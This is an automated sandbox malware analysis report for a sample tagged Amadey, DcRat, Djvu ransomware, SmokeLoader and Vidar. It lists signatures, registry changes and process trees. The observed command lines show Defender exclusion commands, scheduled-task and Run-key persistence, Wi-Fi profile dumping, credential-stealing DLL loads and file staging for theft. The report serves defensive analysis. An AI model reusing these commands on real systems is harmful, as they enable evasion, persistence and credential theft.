Malware Analysis Report

2025-01-02 11:07

Sample ID 240315-bb6wbacf2z
Target 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
SHA256 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
Tags
amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50

Threat Level: Known bad

The file 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat djvu smokeloader vidar 82df9629d6ef6fc7fe54d6eb2bc6137b pub1 backdoor discovery evasion infostealer persistence ransomware rat spyware stealer trojan

DcRat

Amadey

Detected Djvu ransomware

Djvu Ransomware

SmokeLoader

Detect Vidar Stealer

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Downloads MZ/PE file

Modifies file permissions

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Deletes itself

Loads dropped DLL

Reads WinSCP keys stored on the system

Reads local data of messenger clients

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 00:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 00:59

Reported

2024-03-15 01:04

Platform

win7-20240221-en

Max time kernel

303s

Max time network

270s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\4912.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
File created C:\Windows\Tasks\explorgu.job C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\igrvrtd N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igrvrtd N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\61F4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AC2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2400 wrote to memory of 2468 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\igrvrtd
PID 2400 wrote to memory of 2468 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\igrvrtd
PID 2400 wrote to memory of 2468 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\igrvrtd
PID 2400 wrote to memory of 2468 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\igrvrtd
PID 1196 wrote to memory of 2380 N/A N/A C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 2380 N/A N/A C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 2380 N/A N/A C:\Windows\system32\cmd.exe
PID 2380 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2380 wrote to memory of 1524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1196 wrote to memory of 2572 N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 1196 wrote to memory of 2572 N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 1196 wrote to memory of 2572 N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 1196 wrote to memory of 2572 N/A N/A C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2572 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2456 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Windows\SysWOW64\icacls.exe
PID 2456 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Windows\SysWOW64\icacls.exe
PID 2456 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Windows\SysWOW64\icacls.exe
PID 2456 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Windows\SysWOW64\icacls.exe
PID 2456 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2456 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2456 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2456 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2340 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\Temp\4912.exe
PID 2312 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 2312 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 2312 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 2312 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 568 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
PID 2312 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
PID 2312 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
PID 2312 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
PID 2312 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\4912.exe C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
PID 2128 wrote to memory of 2460 N/A C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe

"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {6B9E4C8B-2F6A-46C1-BECC-EDF750FC0F99} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\igrvrtd

C:\Users\Admin\AppData\Roaming\igrvrtd

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\F49C.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Users\Admin\AppData\Local\Temp\4912.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\190491e8-0589-47c4-8568-05aca41dbeb1" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\4912.exe

"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4912.exe

"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1404

C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe

"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

C:\Users\Admin\AppData\Local\Temp\DFB7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 124

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\E9F5.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7D2.exe

C:\Users\Admin\AppData\Local\Temp\7D2.exe

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

C:\Users\Admin\AppData\Local\Temp\5AC2.exe

C:\Users\Admin\AppData\Local\Temp\61F4.exe

C:\Users\Admin\AppData\Local\Temp\61F4.exe

C:\Users\Admin\AppData\Local\Temp\70C4.exe

C:\Users\Admin\AppData\Local\Temp\70C4.exe

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\461186416230_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Windows\SysWOW64\WerFault.exe

